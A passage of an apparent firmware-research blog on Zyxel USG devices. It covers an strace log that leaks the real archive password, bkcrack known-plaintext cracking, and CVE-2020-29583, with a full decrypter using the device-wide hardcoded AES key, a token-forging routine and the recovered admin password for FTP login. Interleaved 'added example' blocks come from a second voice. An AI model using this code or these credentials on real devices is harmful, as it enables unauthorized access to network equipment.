1:1f1d","etc_writable/usb_modeswitch/12d1:1f1e","etc_writable/usb_modeswitch/12d1:380b","etc_writable/usb_modeswitch/1307:1169","etc_writable/usb_modeswitch/1410:5010","etc_writable/usb_modeswitch/1410:5020","etc_writable/usb_modeswitch/1410:5023","etc_writable/usb_modeswitch/1410:5030","etc_writable/usb_modeswitch/1410:5031","etc_writable/usb_modeswitch/1410:5041","etc_writable/usb_modeswitch/1410:5055","etc_writable/usb_modeswitch/1410:5059","etc_writable/usb_modeswitch/1410:7001","etc_writable/usb_modeswitch/148e:a000","etc_writable/usb_modeswitch/148f:2578","etc_writable/usb_modeswitch/15eb:7153","etc_writable/usb_modeswitch/1614:0800","etc_writable/usb_modeswitch/1614:0802","etc_writable/usb_modeswitch/16d8:6281","etc_writable/usb_modeswitch/16d8:6803","etc_writable/usb_modeswitch/16d8:6804","etc_writable/usb_modeswitch/16d8:700a","etc_writable/usb_modeswitch/16d8:700b","etc_writable/usb_modeswitch/16d8:f000","etc_writable/usb_modeswitch/1726:f00e","etc_writable/usb_modeswitch/1782:0003","etc_writable/usb_modeswitch/198a:0003","etc_writable/usb_modeswitch/198f:bccd","etc_writable/usb_modeswitch/19d2:#linux","etc_writable/usb_modeswitch/19d2:0003","etc_writable/usb_modeswitch/19d2:0026","etc_writable/usb_modeswitch/19d2:0040","etc_writable/usb_modeswitch/19d2:0053","etc_writable/usb_modeswitch/19d2:0083:uPr=WCDMA","etc_writable/usb_modeswitch/19d2:0101","etc_writable/usb_modeswitch/19d2:0103","etc_writable/usb_modeswitch/19d2:0110","etc_writable/usb_modeswitch/19d2:0115","etc_writable/usb_modeswitch/19d2:0120","etc_writable/usb_modeswitch/19d2:0146","etc_writable/usb_modeswitch/19d2:0149","etc_writable/usb_modeswitch/19d2:0150","etc_writable/usb_modeswitch/19d2:0154","etc_writable/usb_modeswitch/19d2:0166","etc_writable/usb_modeswitch/19d2:0169","etc_writable/usb_modeswitch/19d2:0266","etc_writable/usb_modeswitch/19d2:0304","etc_writable/usb_modeswitch/19d2:0318","etc_writable/usb_modeswitch/19d2:0325","etc_writable/usb_modeswitch/19d2:0388","etc_writable/usb_modeswitch/19d2:0413","etc_writable/usb_modeswitch/19d2:1001","etc_writable/usb_modeswitch/19d2:1007","etc_writable/usb_modeswitch/19d2:1009","etc_writable/usb_modeswitch/19d2:1013","etc_writable/usb_modeswitch/19d2:1017","etc_writable/usb_modeswitch/19d2:1030","etc_writable/usb_modeswitch/19d2:1038","etc_writable/usb_modeswitch/19d2:1171","etc_writable/usb_modeswitch/19d2:1175","etc_writable/usb_modeswitch/19d2:1179","etc_writable/usb_modeswitch/19d2:1201","etc_writable/usb_modeswitch/19d2:1207","etc_writable/usb_modeswitch/19d2:1210","etc_writable/usb_modeswitch/19d2:1216","etc_writable/usb_modeswitch/19d2:1219","etc_writable/usb_modeswitch/19d2:1224","etc_writable/usb_modeswitch/19d2:1225","etc_writable/usb_modeswitch/19d2:1227","etc_writable/usb_modeswitch/19d2:1232","etc_writable/usb_modeswitch/19d2:1233","etc_writable/usb_modeswitch/19d2:1237","etc_writable/usb_modeswitch/19d2:1238","etc_writable/usb_modeswitch/19d2:1420","etc_writable/usb_modeswitch/19d2:1511","etc_writable/usb_modeswitch/19d2:1514","etc_writable/usb_modeswitch/19d2:1517","etc_writable/usb_modeswitch/19d2:1520","etc_writable/usb_modeswitch/19d2:1523","etc_writable/usb_modeswitch/19d2:1528","etc_writable/usb_modeswitch/19d2:1536","etc_writable/usb_modeswitch/19d2:1542","etc_writable/usb_modeswitch/19d2:1588","etc_writable/usb_modeswitch/19d2:2000","etc_writable/usb_modeswitch/19d2:2004","etc_writable/usb_modeswitch/19d2:bccd","etc_writable/usb_modeswitch/19d2:ffde","etc_writable/usb_modeswitch/19d2:ffe6","etc_writable/usb_modeswitch/19d2:fff5","etc_writable/usb_modeswitch/19d2:fff6","etc_writable/usb_modeswitch/1a8d:1000","etc_writable/usb_modeswitch/1a8d:2000","etc_writable/usb_modeswitch/1ab7:5700","etc_writable/usb_modeswitch/1b7d:0700","etc_writable/usb_modeswitch/1bbb:000f","etc_writable/usb_modeswitch/1bbb:00ca","etc_writable/usb_modeswitch/1bbb:011f","etc_writable/usb_modeswitch/1bbb:022c","etc_writable/usb_modeswitch/1bbb:f000","etc_writable/usb_modeswitch/1bbb:f017","etc_writable/usb_modeswitch/1bbb:f052","etc_writable/usb_modeswitch/1c9e:1001","etc_writable/usb_modeswitch/1c9e:6000","etc_writable/usb_modeswitch/1c9e:6061:uPr=Storage","etc_writable/usb_modeswitch/1c9e:9101","etc_writable/usb_modeswitch/1c9e:9200","etc_writable/usb_modeswitch/1c9e:9401","etc_writable/usb_modeswitch/1c9e:9800","etc_writable/usb_modeswitch/1c9e:98ff","etc_writable/usb_modeswitch/1c9e:9d00","etc_writable/usb_modeswitch/1c9e:9e00","etc_writable/usb_modeswitch/1c9e:9e08","etc_writable/usb_modeswitch/1c9e:f000","etc_writable/usb_modeswitch/1c9e:f000:uMa=USB_Modem","etc_writable/usb_modeswitch/1d09:1000","etc_writable/usb_modeswitch/1d09:1021","etc_writable/usb_modeswitch/1d09:1025","etc_writable/usb_modeswitch/1da5:f000","etc_writable/usb_modeswitch/1dbc:0669","etc_writable/usb_modeswitch/1dd6:1000","etc_writable/usb_modeswitch/1de1:1101","etc_writable/usb_modeswitch/1e0e:f000","etc_writable/usb_modeswitch/1e89:f000","etc_writable/usb_modeswitch/1edf:6003","etc_writable/usb_modeswitch/1ee8:0003","etc_writable/usb_modeswitch/1ee8:0009","etc_writable/usb_modeswitch/1ee8:0013","etc_writable/usb_modeswitch/1ee8:0018","etc_writable/usb_modeswitch/1ee8:0040","etc_writable/usb_modeswitch/1ee8:0045","etc_writable/usb_modeswitch/1ee8:004a","etc_writable/usb_modeswitch/1ee8:004f","etc_writable/usb_modeswitch/1ee8:0054","etc_writable/usb_modeswitch/1ee8:0060","etc_writable/usb_modeswitch/1ee8:0063","etc_writable/usb_modeswitch/1ee8:0068","etc_writable/usb_modeswitch/1f28:0021","etc_writable/usb_modeswitch/1fac:0032","etc_writable/usb_modeswitch/1fac:0130","etc_writable/usb_modeswitch/1fac:0150","etc_writable/usb_modeswitch/1fac:0151","etc_writable/usb_modeswitch/2001:00a6","etc_writable/usb_modeswitch/2001:98ff","etc_writable/usb_modeswitch/2001:a401","etc_writable/usb_modeswitch/2001:a403","etc_writable/usb_modeswitch/2001:a405","etc_writable/usb_modeswitch/2001:a706","etc_writable/usb_modeswitch/2001:a707","etc_writable/usb_modeswitch/2001:a708","etc_writable/usb_modeswitch/2001:a805","etc_writable/usb_modeswitch/2001:a80b","etc_writable/usb_modeswitch/2001:ab00","etc_writable/usb_modeswitch/201e:1023","etc_writable/usb_modeswitch/201e:2009","etc_writable/usb_modeswitch/2020:0002","etc_writable/usb_modeswitch/2020:f00e","etc_writable/usb_modeswitch/2020:f00f","etc_writable/usb_modeswitch/2077:1000","etc_writable/usb_modeswitch/2077:f000","etc_writable/usb_modeswitch/20a6:f00e","etc_writable/usb_modeswitch/20b9:1682","etc_writable/usb_modeswitch/21f5:1000","etc_writable/usb_modeswitch/21f5:3010","etc_writable/usb_modeswitch/2262:0001","etc_writable/usb_modeswitch/22de:6801","etc_writable/usb_modeswitch/22de:6803","etc_writable/usb_modeswitch/22f4:0021","etc_writable/usb_modeswitch/230d:0001","etc_writable/usb_modeswitch/230d:0003","etc_writable/usb_modeswitch/230d:0007","etc_writable/usb_modeswitch/230d:000b","etc_writable/usb_modeswitch/230d:000d","etc_writable/usb_modeswitch/230d:0101","etc_writable/usb_modeswitch/230d:0103","etc_writable/usb_modeswitch/2357:0200","etc_writable/usb_modeswitch/2357:f000","etc_writable/usb_modeswitch/23a2:1010","etc_writable/usb_modeswitch/257a:a000","etc_writable/usb_modeswitch/257a:b000","etc_writable/usb_modeswitch/257a:c000","etc_writable/usb_modeswitch/257a:d000","etc_writable/usb_modeswitch/8888:6500","etc_writable/usb_modeswitch/ed09:1021","etc_writable/wtpinfo","etc_writable/zyxel/","etc_writable/zyxel/conf/","etc_writable/zyxel/conf/__apcoverage_default.xml","etc_writable/zyxel/conf/__eps_checking_default.xml","etc_writable/zyxel/conf/__firewall_default.xml","etc_writable/zyxel/conf/__geoip_default.xml","etc_writable/zyxel/conf/__localwtp_default.xml","etc_writable/zyxel/conf/__route_default.xml","etc_writable/zyxel/conf/__system_default.xml","etc_writable/zyxel/conf/__system_default.xml-usg40","etc_writable/zyxel/conf/__system_default.xml-usg40w","etc_writable/zyxel/conf/__wantrunk_default.xml","etc_writable/zyxel/conf/__zwo.xml","etc_writable/zyxel/coredump_script/","etc_writable/zyxel/coredump_script/common.sh","etc_writable/zyxel/coredump_script/samples.sh","etc_writable/zyxel/coredump_script/sdwan_common.sh","etc_writable/zyxel/secuextender/","etc_writable/zyxel/secuextender/applet.html","etc_writable/zyxel/secuextender/sslapp.jar","etc_writable/zyxel/selector/","filechecksum","filelist","fwversion","wtpinfo",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
= 12766
12764 write(1,0x10127428,1). = 1
12764 open("/rw/compress.img",O_RDONLY) = -1 errno=2 (No such file or directory)
12764 fork() = 12770
12764 wait4(-1,1082108672,0,0,269668096,1) = 0
12770 execve("./unzip",{"./unzip","-o","-q","-P","vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko","470AALA0C0.bin","-d","/","db/etc/zyxel/ftp/conf/","db/etc/zyxel/ftp/conf/system-default.conf",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
= 12770
12764 write(1,0x10127428,1). = 1
12764 open("//db/etc/zyxel/ftp/conf/system-default.conf",O_RDONLY) = -1 errno=2 (No such file or directory)
12764 write(1,0x10127428,2)
= 2
12764 exit(-66)
cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$
```
In the log above, notice:

The argument right after -P should be the archive password: vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko. Go back to Windows and try it:

Well, well, it really is. Lucky I didn't force-crack the archive password during the plaintext attack; this password is absurdly long!
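What the strace session above exposed is a password handed to a child process as a plain command-line argument: `zld_fsextract` forks `./unzip -P <password> ...`, so anyone who can trace the process or read its argument vector sees the secret. The following added example (not code from the post or from qemu) parses `execve` lines from `qemu -strace` / `strace -f` style output into argument vectors and flags arguments that carry a secret for the programs it knows about, reporting the value redacted. The trace lines are constructed after the session above and the password in them is a placeholder, not the real one; the table of secret-bearing flags is an assumption for the listed programs and would need extending for others.

```python
"""Pull execve() argument vectors out of strace-style output and flag secrets passed on the command line.

Added example, not code from the post. SAMPLE_TRACE is constructed; the password value is a placeholder.
"""
import os
import re

# program basename -> (flags whose secret is the NEXT argument, prefixes with the secret ATTACHED)
SECRET_ARGS = {
    "unzip": ({"-P"}, ()),                                  # unzip -P <password>
    "zip": ({"-P"}, ()),                                    # zip -P <password>
    "7z": (set(), ("-p",)),                                 # 7z x -p<password>
    "openssl": ({"-pass", "-passin", "-passout"}, ()),     # openssl ... -pass pass:<secret>
}
GENERIC_PREFIXES = ("--password=",)                         # assumed convention, many tools use it

# pid, path and the {...} argv block; not anchored, because strace -f can print a child's execve on the
# same physical line as the parent's unfinished wait4() (as happens in the session above)
EXECVE_RE = re.compile(r'(?P<pid>\d+)\s+execve\("(?P<path>[^"]*)",\{(?P<argv>.*?)\}')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')                # quoted argv strings; the trailing NULL is unquoted


def parse_execve_lines(text: str) -> list:
    """Return (pid, path, argv) for every execve call found in the trace text."""
    calls = []
    for line in text.splitlines():
        for m in EXECVE_RE.finditer(line):
            calls.append((int(m.group("pid")), m.group("path"), ARG_RE.findall(m.group("argv"))))
    return calls


def find_secrets(argv: list) -> list:
    """Return (flag, value) pairs where argv carries a secret as a plain argument."""
    if not argv:
        return []
    separate, attached = SECRET_ARGS.get(os.path.basename(argv[0]), (set(), ()))
    found = []
    for i in range(1, len(argv)):
        arg = argv[i]
        if arg in separate and i + 1 < len(argv):
            found.append((arg, argv[i + 1]))
        for prefix in attached + GENERIC_PREFIXES:
            if arg.startswith(prefix) and len(arg) > len(prefix):
                found.append((prefix, arg[len(prefix):]))
    return found


def redact(value: str, keep: int = 4) -> str:
    """Keep only a short prefix so findings can be correlated without re-exposing the secret."""
    return value[:keep] + "*" * max(0, len(value) - keep)


def audit_trace(text: str) -> list:
    """One finding per secret-bearing argument, with the value redacted."""
    findings = []
    for pid, path, argv in parse_execve_lines(text):
        for flag, value in find_secrets(argv):
            findings.append({"pid": pid, "program": path, "flag": flag,
                             "redacted": redact(value), "length": len(value)})
    return findings


# Constructed sample modelled on the qemu -strace session above (password replaced by a placeholder).
SAMPLE_TRACE = """\
12764 open("470AALA0C0.bin",O_RDONLY) = 3
12764 fork() = 12766
12764 wait4(-1,1082108672,0,0,1082129416,2)12766 execve("./unzip",{"./unzip","-o","-q","-P","EXAMPLE-ARCHIVE-PASSWORD-PLACEHOLDER","470AALA0C0.bin","-d","/rw","compress.img",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
12764 open("/rw/compress.img",O_RDONLY) = -1 errno=2 (No such file or directory)
12770 execve("./unzip",{"./unzip","-o","-q","-P","EXAMPLE-ARCHIVE-PASSWORD-PLACEHOLDER","470AALA0C0.bin","-d","/","db/etc/zyxel/ftp/conf/system-default.conf",NULL})qemu: uncaught target signal 4 (Illegal instruction) - core dumped
12771 execve("/bin/sh",{"/bin/sh","-c","echo ok",NULL}) = 0
"""

if __name__ == "__main__":
    for f in audit_trace(SAMPLE_TRACE):
        print("pid %d %s %s %s (%d chars)" % (f["pid"], f["program"], f["flag"], f["redacted"], f["length"]))
```

Pointed at a real trace file instead of `SAMPLE_TRACE`, the same functions give a quick inventory of every child process a firmware helper spawns and of every credential it passes by argument, which is the design weakness this section of the post illustrates.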
Supplement

Of course, a plaintext attack does not only mean the attacker knows the entire contents of one encrypted file in the archive; partially known plaintext works too. For example:

- Known partial plaintext: `*lag{16e3********************74f6********`
- Ciphertext to be guessed: `flag{16e371fa-0555-47fc-b343-74f6754f6c01}`
- (the plaintext and the ciphertext here differ in length)

I used 7-zip to compress the plaintext into the encrypted archive flag.zip (7-zip default parameters) with the password cyberangel. The cracking procedure is as follows; we need to split the known plaintext into two parts:

```bash
$ echo -n "lag{16e3" > plain1.txt   # the contiguous plaintext
$ echo -n "74f6" | xxd              # the extra plaintext in hexadecimal: 37346636
```

Attack: `bkcrack -C flag.zip -c flag.txt -p plain1.txt -o 1 -x 29 37346636` (obtains the keys): 10d73eba 07e8a69e b69f719c (took 25 minutes; lousy Mac, fan roaring)

Unpack: `bkcrack -C flag.zip -c flag.txt -k 10d73eba 07e8a69e b69f719c -d res.txt`

> `bkcrack -C [encrypted archive] -c [target ciphertext entry in the archive] -p [plaintext 1] -o [offset of plaintext 1 in the file before encryption] -x [offset of plaintext 2 in the file before encryption] [plaintext 2, in hex]`
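Both `zipdecrypt` earlier and `bkcrack -k ... -d` here decrypt with the three 32-bit keys and never need the password, and the pkcrack note above explains why recovering the password on top of them is the expensive part. The reason is the cipher itself: legacy ZipCrypto (PKWARE APPNOTE section 6.1) keeps its entire state in those three words; the password only initialises them, and every plaintext byte then updates them. The following added example implements that cipher from the published description (it is not bkcrack, pkcrack or code from the post) to make this concrete: it shows the 12-byte encryption header with its check byte, why `-o 0` in bkcrack's help means the first byte after that header, and that any password producing the same three words is equivalent. The password, entry contents and header bytes are constructed.

```python
"""Legacy PKWARE 'ZipCrypto' stream cipher, written from the APPNOTE description.

Added example, not bkcrack/pkcrack code. The keys are the same three words those tools recover.
"""
import zlib

KEY0_INIT, KEY1_INIT, KEY2_INIT = 0x12345678, 0x23456789, 0x34567890


def _make_crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = _make_crc_table()


def _crc32_step(crc: int, byte: int) -> int:
    """One table step of the raw (non-inverted) CRC-32 the key schedule uses."""
    return CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


def entry_crc(data: bytes) -> int:
    """The CRC-32 stored in the ZIP directory for an entry."""
    return zlib.crc32(data) & 0xFFFFFFFF


class ZipCrypto:
    """Cipher state is exactly the three 32-bit words (X, Y, Z) that pkcrack/bkcrack recover."""

    def __init__(self, keys=(KEY0_INIT, KEY1_INIT, KEY2_INIT)):
        self.k0, self.k1, self.k2 = keys

    @classmethod
    def from_password(cls, password: bytes):
        state = cls()
        for b in password:           # the password is consumed once, to set up the state
            state.update(b)
        return state

    @property
    def keys(self) -> tuple:
        return (self.k0, self.k1, self.k2)

    def update(self, byte: int) -> None:
        self.k0 = _crc32_step(self.k0, byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for p in plain:
            out.append(p ^ self.keystream_byte())
            self.update(p)           # the state advances on the PLAINTEXT byte
        return bytes(out)

    def decrypt(self, cipher: bytes) -> bytes:
        out = bytearray()
        for c in cipher:
            p = c ^ self.keystream_byte()
            self.update(p)
            out.append(p)
        return bytes(out)


def internal_keys(password: bytes) -> tuple:
    """The 'internal password representation' in bkcrack's wording."""
    return ZipCrypto.from_password(password).keys


def encrypt_entry(password: bytes, data: bytes, header_random: bytes) -> bytes:
    """Encrypted entry body: 12-byte header (11 random bytes + check byte) followed by the data.

    The check byte is the high byte of the entry CRC-32, which bkcrack uses as free known plaintext
    unless --ignore-check-byte is given.
    """
    assert len(header_random) == 11
    check = entry_crc(data) >> 24
    return ZipCrypto.from_password(password).encrypt(header_random + bytes([check]) + data)


def decrypt_entry(keys: tuple, body: bytes, expected_crc: int = None) -> bytes:
    """Decrypt with the internal keys only, as zipdecrypt and `bkcrack -k ... -d` do.

    Offset 0 in bkcrack's -o convention is the first byte AFTER the 12-byte header decrypted here.
    """
    state = ZipCrypto(keys)
    header = state.decrypt(body[:12])
    if expected_crc is not None and header[11] != (expected_crc & 0xFFFFFFFF) >> 24:
        raise ValueError("check byte mismatch: wrong keys")
    return state.decrypt(body[12:])
```

Since the state after the password is just (X, Y, Z), two passwords that reach the same three words are interchangeable; that is why bkcrack's `-r` promises "the password or an equivalent one", and why the post could skip the password search entirely once the keys were known.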
```bash
cyberangel@cyberangel:~/Desktop/Zyxel/test$ bkcrack -h
bkcrack 1.5.0 - 2022-07-07
usage: bkcrack [options]
Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Options to get the internal password representation:
 -c, --cipher-file <file>    Zip entry or file on disk containing ciphertext
     --cipher-index <index>  Index of the zip entry containing ciphertext
 -C, --cipher-zip <archive>  Zip archive containing the ciphertext entry
 -p, --plain-file <file>     Zip entry or file on disk containing plaintext
     --plain-index <index>   Index of the zip entry containing plaintext
 -P, --plain-zip <archive>   Zip archive containing the plaintext entry
 -t, --truncate <size>       Maximum number of bytes of plaintext to load
 -o, --offset <offset>       Known plaintext offset relative to ciphertext
                              without encryption header (may be negative)
 -x, --extra <offset> <data> Additional plaintext in hexadecimal starting
                              at the given offset (may be negative)
     --ignore-check-byte     Do not automatically use ciphertext's check byte
                              as known plaintext
 -e, --exhaustive            Try all the keys remaining after Z reduction
     --password <password>   Password from which to derive the internal password
                              representation. Useful for testing purposes and
                              advanced scenarios such as reverting the effect of
                              the --change-password command.

Options to use the internal password representation:
 -k, --keys <X> <Y> <Z>      Internal password representation as three 32-bits
                              integers in hexadecimal (requires -d, -U,
                              --change-keys or -r)
 -d, --decipher <file>       File to write the deciphered data (requires -c)
     --keep-header           Write the encryption header at the beginning of
                              deciphered data instead of discarding it
 -U, --change-password <archive> <password>
                             Create a copy of the encrypted zip archive with the password set to the
                             given new password (requires -C)
     --change-keys <archive> <X> <Y> <Z>
                             Create a copy of the encrypted zip archive using the given new internal
                             password representation (requires -C)
 -r, --recover-password <length> <charset>
                             Try to recover the password or an equivalent one up to the given length
                             using characters in the given charset. The charset is a sequence of
                             characters or shortcuts for predefined charsets listed below.
                             Example: ?l?d-.@
                               ?l lowercase letters
                               ?u uppercase letters
                               ?d decimal digits
                               ?s punctuation
                               ?a alpha-numerical characters (same as ?l?u?d)
                               ?p printable characters (same as ?a?s)
                               ?b all bytes (0x00 - 0xff)

Other options:
 -L, --list <archive>        List entries in a zip archive and exit
 -h, --help                  Show this help and exit

Environment variables:
 OMP_NUM_THREADS             Number of threads to use for parallel computations
cyberangel@cyberangel:~/Desktop/Zyxel/test$
```

Note: the longer the known plaintext, the faster the crack.

The firmware used in this article still contains the `CVE-2020-29583` backdoor vulnerability; the admin user's encrypted password is the ciphertext shown in the red box below, `$4$WliGKvFQ$yMEH/WCnH1+NXuIUp0lzpUinIyEnrHFoRgesi6NdOFytmQg8lRfsVzUUjBGY+FiS4Up6KIgoP8OMEP0L3hRYSN2kpFTDIet31GoNwlM+S7U$` (in `__system_default.xml-usg40` or `__system_default.xml-usg40w`):

This encryption scheme uses two things, base64 encoding and AES encryption, and a master abroad has already written the corresponding decryption script: [https://github.com/inode-/zyxel_password_decrypter](https://github.com/inode-/zyxel_password_decrypter). We can save that ciphertext string to a txt file and then decrypt it:

```python
'''
/*****************************************************************************
* Zyxel password decrypter *
* *
* Copyright (c) 2022, Agazzini Maurizio - maurizio.agazzini@hnsecurity.it *
* All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* * Redistributions of source code must retain the above copyright *
* notice, this list of conditions and the following disclaimer. *
* * Redistributions in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in *
* the documentation and/or other materials provided with the *
* distribution. *
* * Neither the name of @ Mediaservice.net nor the names of its *
* contributors may be used to endorse or promote products derived *
* from this software without specific prior written permission. *
* *
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS *
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT *
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR *
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT *
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, *
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED *
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR *
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF *
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING *
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS *
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
*****************************************************************************/
'''
import argparse
import base64
import binascii
import re
import sys

from Crypto.Cipher import AES  # pycryptodome

# Key (24 bytes, so AES-192) and IV are constants baked into the firmware:
# every device shares them, which is what makes offline decryption possible.
aes_key = "001200054A1F23FB1F060A14CD0D018F5AC0001306F0121C"
aes_iv = "0006001C01F01FC0FFFFFFFFFFFFFFFF"
key = binascii.unhexlify(aes_key)
iv = binascii.unhexlify(aes_iv)


def aes_decrypt(b64_text):
    # A fresh cipher object per call, since a CBC object keeps chaining state.
    # Stored blobs have their '=' padding stripped; appending '==' restores it.
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.decrypt(base64.b64decode(b64_text + '=='))


def extract(decrypted, salt):
    # Decrypted layout: salt, then the password, then NUL padding.
    text = decrypted.decode('utf-8')
    return text[len(salt):text.find('\x00')]


def decrypt_4(salt, b64_text):
    # $4$<salt>$<base64 blob>$ : a single AES-CBC layer.
    decrypted = aes_decrypt(b64_text)
    if salt.encode() not in decrypted:
        return None
    return extract(decrypted, salt)


def decrypt_5(salt_outer, salt_inner, b64_text):
    # $5$<salt_outer>$<salt_inner>$<base64 blob>$ : the $4$ layer applied twice;
    # the inner plaintext is itself a base64 blob keyed to the outer salt.
    decrypted = aes_decrypt(b64_text)
    if salt_inner.encode() not in decrypted:
        return None
    text = decrypted.decode('utf-8')
    inner = text[len(salt_inner):text.find('\x00') - 1]
    decrypted = aes_decrypt(inner)
    if salt_outer.encode() not in decrypted:
        return None
    return extract(decrypted, salt_outer)


parser = argparse.ArgumentParser(description='Zyxel password decrypter')
parser.add_argument('--in', dest='filename', help='configuration file', required=True)
args = parser.parse_args()

filein = args.filename
fileout = args.filename + "_decrypted"

print("Zyxel password decrypter\n")

try:
    with open(filein, 'r') as infile:
        all_lines = infile.readlines()
except OSError:
    print("[!] can't open " + filein)
    sys.exit(1)

try:
    outfile = open(fileout, 'w')
except OSError:
    print("[!] can't open for writing " + fileout)
    sys.exit(1)

passwords = 0

for line in all_lines:
    par = None
    if "$4$" in line:
        par = re.search(r"\$.*?\$(.*?)\$(.*?)\$", line)
        work = lambda: decrypt_4(par.group(1), par.group(2))
    elif "$5$" in line:
        par = re.search(r"\$.*?\$(.*?)\$(.*?)\$(.*?)\$", line)
        work = lambda: decrypt_5(par.group(1), par.group(2), par.group(3))
    if par is not None:
        label = par.group(0)[:20]
        print("[ ] Decrypting " + label + "...", end='')
        try:
            clear_pass = work()
        except Exception:  # bad base64, wrong block length, non-UTF-8 plaintext, ...
            clear_pass = None
        if clear_pass is not None:
            line = line.replace(par.group(0), clear_pass)
            print("\r[X] Decrypting " + label + "... OK - (" + clear_pass + ")")
            passwords += 1
        else:
            print("\r[-] Decrypting " + label + "... KO - Decryption failed")
    outfile.write(line)

outfile.close()
print("\nDecrypted " + str(passwords) + " passwords")
print("Decrypted config file saved at " + fileout)
```
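What the script above undoes, written out as an added example that is neither the post's code nor the decrypter's: a `$4$` token carries a salt plus the base64 of an AES-CBC ciphertext under a key and IV that are the same on every device, so anyone holding the firmware can not only decrypt existing tokens but also mint new ones. `decode_4` is a compact version of the script's `$4$` branch; `encode_4` is its inverse and an assumption derived by inverting the decrypter (the page does not state how the firmware pads, so the example NUL-pads to a 16-byte multiple, with an optional minimum length). The salt `WliGKvFQ`, the password `1234` and `PAGE_TOKEN` are copied from the post; the `$5$` double-wrapped variant is left to the script. AES comes from pycryptodome, with the `cryptography` package as a fallback.

```python
import base64
import binascii

# Key (24 bytes, AES-192) and IV from the decrypter: identical on every device.
KEY = binascii.unhexlify("001200054A1F23FB1F060A14CD0D018F5AC0001306F0121C")
IV = binascii.unhexlify("0006001C01F01FC0FFFFFFFFFFFFFFFF")

# The admin token exactly as the post prints it.
PAGE_TOKEN = ("$4$WliGKvFQ$yMEH/WCnH1+NXuIUp0lzpUinIyEnrHFoRgesi6NdOFytmQg8lRfsVzUUjBGY"
              "+FiS4Up6KIgoP8OMEP0L3hRYSN2kpFTDIet31GoNwlM+S7U$")


def _aes_cbc(data, encrypt):
    # Raw AES-CBC with the fixed key/IV, via pycryptodome or the `cryptography` package.
    try:
        from Crypto.Cipher import AES
        cipher = AES.new(KEY, AES.MODE_CBC, IV)
        return cipher.encrypt(data) if encrypt else cipher.decrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        ctx = Cipher(algorithms.AES(KEY), modes.CBC(IV))
        op = ctx.encryptor() if encrypt else ctx.decryptor()
        return op.update(data) + op.finalize()


def decode_4(token):
    # Recover the password from $4$<salt>$<base64>$; ValueError if the token does not fit.
    parts = token.split("$")
    if len(parts) != 5 or parts[1] != "4":
        raise ValueError("not a $4$ token")
    salt, blob = parts[2], parts[3]
    # Stored blobs have their '=' padding stripped; restore it before decoding.
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    plain = _aes_cbc(raw, encrypt=False)
    if not plain.startswith(salt.encode()):
        raise ValueError("salt not found in plaintext: wrong key or damaged token")
    # Layout: salt, password, NUL padding up to the block boundary.
    return plain[len(salt):].split(b"\x00", 1)[0].decode("utf-8")


def try_decode_4(token):
    # decode_4 that reports failure as None instead of raising.
    try:
        return decode_4(token)
    except ValueError:
        return None


def encode_4(salt, password, min_len=16):
    # Inverse of decode_4 (assumed format): NUL-pad salt+password to a 16-byte
    # multiple of at least min_len, AES-CBC it, base64 it without '=' padding.
    data = salt.encode() + password.encode()
    n = max(len(data) + 1, min_len)  # always leave room for a NUL terminator
    n = (n + 15) // 16 * 16
    blob = _aes_cbc(data.ljust(n, b"\x00"), encrypt=True)
    return "$4$%s$%s$" % (salt, base64.b64encode(blob).decode().rstrip("="))


if __name__ == "__main__":
    print("page token ->", try_decode_4(PAGE_TOKEN))
    forged = encode_4("WliGKvFQ", "1234", min_len=80)  # same salt, attacker-chosen token
    print("forged token ->", forged, "->", decode_4(forged))
```

Two things follow from the round trip. First, the post's token is 107 base64 characters, which decodes to 80 bytes, so the firmware evidently pads the salt-plus-password buffer to 80 bytes; `min_len=80` reproduces a token of that shape. Second, with a constant key and a constant IV, CBC is deterministic: the same salt and password yield the same token on every device, and the salt is the only thing that differs between two configs. This is reversible obfuscation, not password hashing, so a leaked `system-default.conf` or backup should be treated as containing cleartext credentials.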

The recovered password is 1234, and it can be used to log in to the FTP service on port 21. The encryption process itself will be analyzed in the next article (I have never studied AES, so I am learning it as I go).

